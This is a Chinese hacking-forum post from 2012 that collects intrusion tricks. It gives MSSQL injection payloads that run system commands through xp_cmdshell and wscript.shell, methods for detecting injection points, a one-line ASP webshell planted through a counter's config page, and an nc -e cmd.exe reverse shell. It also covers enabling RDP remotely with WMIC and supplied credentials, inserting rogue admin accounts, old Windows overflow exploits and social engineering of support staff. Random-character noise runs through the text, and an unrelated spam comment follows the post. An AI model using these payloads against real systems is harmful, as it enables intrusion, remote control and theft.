中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]
作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关" D8 Y; O7 x9 {1 f4 n  ~) ?% [( {) A

7 o1 J! ~' O% j" C3 E$ c$ L: t7 E! I- x
SA点数据库分离搞法+语句:
% i( ?9 ^0 h) Z' @& s# u! `( L) m& s% i  _/ U
注射点不显错,执行下面三条语句页面都返回正常。
+ Q, w: Y6 V% B$ i$ d+ [and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
6 p. E2 f/ H* Y( b+ ^# F+ Iand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')2 n7 r% z% G' _+ H& E
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
2 K: A% `4 [9 ]+ T# v2 T可以列目录,判断系统为2000,web与数据库分离, T0 {5 O+ a% J. t( `) \: b6 y
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。8 t7 ~+ h: |$ N, i9 k( u1 c
在注射点上执行
8 f$ f3 A+ _# P* d( edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--* e% p, i" T& T( p1 O2 Q
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP, e) F( b5 S; |! k" N
还有我用NC监听得其他端口都没有得到IP。
; v1 A. u# E' V" S* b
" L) c- T6 Z' m! u5 d1 x通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。2 k' c" T5 n5 ^5 z" h/ B$ M
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
7 z& P& ]7 q/ B7 R6 m4 d7 H3 C8 v' A! g8 S& D
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--4 F7 C& W( N6 y# |& @
, v! z. g+ _! o5 V- ~
现在就猜想是不是数据库是内网而且不能连外网。
, G) c4 U' m6 R8 W( [  ?- G
' {/ w: i  Q9 ^/ W3 A- S, T* w
2 ^( B' I# l* ^; E8 O+ V; Waccess导出txt文本代码3 u! m0 E3 t  l
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
6 p* a, Z0 x0 h1 d* {
9 p/ r) _4 c6 }2 s0 P) m( ?* c( X8 U( [4 w  l& Q
. ?; [7 G8 x! l
自动跳转到指定网站代码头3 w; e# T8 k6 Y7 ]" ~6 L
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
: `" n) d- c0 Z) ]8 |' g1 P( O; S- E
8 T, {! L1 f. c# p$ s( Q% T0 y; R! g$ C. G0 v4 ~7 x" E* d
入侵java or jsp站点时默认配置文件路径:& f! f  n. T* |4 z) b  L
\web-inf\web.xml
( ]5 B) d8 R- l2 d5 c/ ~  D$ dtomcat下的配置文件位置:- p+ p( o/ l' d( i
\conf\server.xml            (前面加上tomcat路径), {* |6 M, ?$ Q4 U) u+ ^
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml& q9 X7 k" |' I1 X. t& e
# ]; o) E% ~' t
0 X; w2 d0 e& Q% F+ C% O; Z, i
4 d5 R- F& C( I* z; d& U
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
$ i8 B5 @( G; y, p* v: k+ b. V8 A-1%23( n5 w5 S% h* A( k- m1 V; W
>
' \) I  i6 \* F% e. w& R' F& \! G<
7 |, [9 H) M, u5 ^- |' C* b1'+or+'1'='15 V* }7 B0 q! W- j; i% C( [
id=8%bf
! L$ \- e. ?+ E. B9 N% v5 L0 P
: R9 j! B) N7 U$ j8 Q' G! |, v9 }全新注入点检测试法:
7 X: O1 a/ [0 c- [在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。  G- s. W7 n/ h& ]4 R

- k: ]; @5 e8 Z7 b* o, I% ~5 |4 C在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。0 T+ O; @: Q! y" e* w4 _
& ]! o+ O& v3 j
搜索型注入判断方法:9 f$ N$ F$ L7 X% R
北京%' and '1'='1' and '%'='
5 K' R' `# Q5 e* M北京%' and '1'='2' and '%'='
% ]' Y, U+ w0 Y: E* ~; s- t+ H2 ?2 |+ ~+ N. ]! k- r' ^% V3 P; D
6 G% y( w8 B0 e! a, j/ v! i
COOKIES注入:
( ]  R; e5 I1 g2 q4 F9 E  q  }2 H
2 Q# z: M0 W4 p- X7 }  J8 |javascript:alert(document.cookie="id="+escape("51 and 1=1"));; h' y! Z& t7 \& P

  S# M6 d; C6 H% f! C, l1 r2000专业版查看本地登录用户命令:
9 Z0 C0 b) \0 Y& H: p3 Mnet config workstation
& Y; h- }& ^8 I. ]/ k3 \% g% B6 A; {: z- J8 @

4 O) f8 C- _7 O# J9 p' |; y$ {2003下查看ipsec配置和默认防火墙配置命令:
8 }& m) \8 z1 R6 M& e' Knetsh firewall show config. o6 Q5 Z+ o0 s5 s% o3 I# s
netsh ipsec static show all
& p3 H: t. \6 G5 S& f. i
: O2 L5 F1 t9 O' D1 ~8 @不指派指定策略命令:4 [" r7 g6 v4 l" x: t% M
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
+ l7 L3 Z$ D$ J  @4 r" H3 Q5 }netsh ipsec static show policy all  显示策略名
$ r3 }% Q9 N. f' z8 w. D
7 C0 G- i, O; W# Q8 |' t7 `
$ }' m  U, p0 b: I5 R猜管理员后台小技巧:* \& ]! j# ?1 D8 g9 ]0 F' n4 i2 d. C
admin/left.asp 7 T8 _- s$ z0 w# p/ \* w  b
admin/main.asp  c8 i" f7 E3 ]3 {2 x. D7 J# w
admin/top.asp0 t/ d- s6 ]+ c' T! P
admin/admin.asp + S4 W; `$ E8 P
会现出菜单导航,然后迅雷下载全部链接
: G7 R1 C; D) X% ~+ n. ^8 U- q  l6 M' p( W; u
6 n+ A9 l1 C5 q# k7 z2 j" Y/ }5 J1 _, B5 F
社会工程学:
# s# F- @0 `2 \9 ?8 U+ ^6 w/ Y- a用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
5 `1 v  P0 W( Y, U' ^5 j1 g然后去骗客服) u6 }+ w' V3 w
" g7 x( G. x8 Y- g' R
4 r5 `/ p4 k6 \- J
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
+ J3 P: z7 i' T$ M! r& n& v查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
$ a- q# W  K# t9 ~( J$ q) T9 X  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。8 s7 x& \% m+ |+ ^9 F( g; e: R, n- O

8 ]7 g$ z  R! d1 [' `$ g* n
/ E) A9 @5 N9 X8 k. x, |
# W7 C4 b: h% c4 F6 B% Y6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)- [8 U0 U3 U! L1 r# V3 d
# C/ b# U7 b% N6 W- o  l
; ~+ ^5 Q  n! X
: U: m# P8 Q3 O2 B3 K
CMD加密注册表位置
0 b6 C$ f. a  p( ~(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor' ^7 m+ q* [* a- g
AutoRun. y* C& ]6 c3 J
1 x; j. w9 I5 y- G
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
7 U! v0 r1 K: AAutoRun0 k; `) H3 ^$ v; B3 S, B

' f7 L- k0 `8 D2 h: w
4 f( f; {, Z. }. _! f: P在找注入时搜索Hidden,把他改成test+ D: _- [3 f4 z3 C" Q6 n  z

: F, T# u5 |5 f' z& R
& ~. t' ^7 I1 `) t" @
# V& W$ `  S" v) Hmstsc /v:IP /console 4 v1 M2 Z" W' D

8 R! l* O5 G% K( B
( ^4 x! |; |+ \( T7 k一句话开3389:; G3 w: t- r8 H6 S4 H7 |
# K" i& G( h, q" V, A% {
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
9 T& ?! A* x( s, c0 L8 N3 @开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.; s/ e7 M. U: J$ f3 v
- t" L  A% F4 n8 i

6 k* e6 Y: @5 a7 G1 B5 V知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:# p  X7 k3 b' t" p, _  N
Insert into admin(user,pwd) values('test','test')
; T* Y; z1 N2 o: W* U7 o) y4 L* p; H" e  g9 U& @7 l+ Q: c8 ]
; F) E. P0 n' O! }" u' a! H7 g
NC反弹3 d0 a, h3 V2 ?4 b
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   7 {9 q; K3 n7 x/ V" R
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)6 g7 l6 W, J, M. o8 ]  F7 K

* I+ B/ ~# P# ~4 s: k. `' W1 _. J" I! O$ G
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题, j# d; g" D% h
2 B1 d7 y& P8 W
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
4 L) t  u8 M% V0 T6 F3 N# B0 K4 a+ ]例如:
3 ]1 g( d# v1 tsubst k: d:\www\ 用d盘www目录替代k盘
* w5 T+ E5 O. Lsubst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2